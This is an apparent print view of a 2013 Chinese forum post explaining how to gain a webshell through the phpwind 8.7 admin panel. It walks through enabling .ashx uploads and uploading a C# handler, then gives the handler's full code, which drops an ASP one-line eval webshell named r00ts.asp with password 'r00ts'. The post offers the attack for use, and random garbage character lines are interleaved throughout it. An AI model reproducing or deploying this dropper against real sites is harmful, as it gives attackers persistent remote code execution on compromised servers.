中国网络渗透测试联盟
标题:
phpwind 8.7 后台拿shell
[打印本页]
作者:
admin
时间:
2013-7-26 12:41
标题:
phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
$ \6 o; X1 s* ~2 i) d6 N
4 f6 T! ~" _! e# y9 ]7 t; H
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
# z7 E4 b x; w1 E3 ?) w8 W
/ M8 \/ ? n8 c+ y5 r. R; J4 T
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
$ _+ K! g( y- @' H# w+ x- f- M" z
; J' S" N, T Q) g Z3 o5 I2 U1 |
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
8 D$ V) ~8 Q/ D# [$ {$ n4 y* @
$ P$ W+ L9 @# N( L% ?0 {6 L, h
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
1 g1 C# Z' S2 c% t$ J" p* Q
7 S" N/ x% f5 W6 w! u# a
下面是代码:
2 \4 N ?& \9 G, @6 {% S
/ K: X8 K; R+ M0 q& p
<%@ WebHandler Language="C#"Class="Handler" %>
& U; s5 a' e) f
using System;
2 o: _$ t* w" |! f" Z
using System.Web;
7 @. ]- a/ S2 H( C& B; L# X
using System.IO;
" |+ H% q' M! T( X
public class Handler : IHttpHandler {
+ v U" ~+ S0 v* A D7 i
public void ProcessRequest (HttpContext context) {
) F( Z9 T5 w/ ]* _3 L) S) L
context.Response.ContentType = "text/plain";
4 }9 k& b2 f; O2 P+ l G `
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
( F* c5 A' l* z* v, s
file1.Write("<%eval request(\"r00ts\")%>");
: e3 z, f. r( R& ~% P
file1.Flush();
; w) I" Q7 i6 Q) ?
file1.Close();
" x* z3 e# f: Y
}
8 i* e" G# j( L1 { U' [' f
public bool IsReusable {
6 Z M2 l6 ?+ s) J4 G
get {
; s0 G4 i9 o) u: {
return false;
1 |1 U7 A5 S, @# M; i$ A
}
# u' I( K7 i* x; d+ N, k
}
9 m* c5 G/ Q2 ]6 j4 o7 ]
}
+ e8 A5 _7 k8 y- j( }! n
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2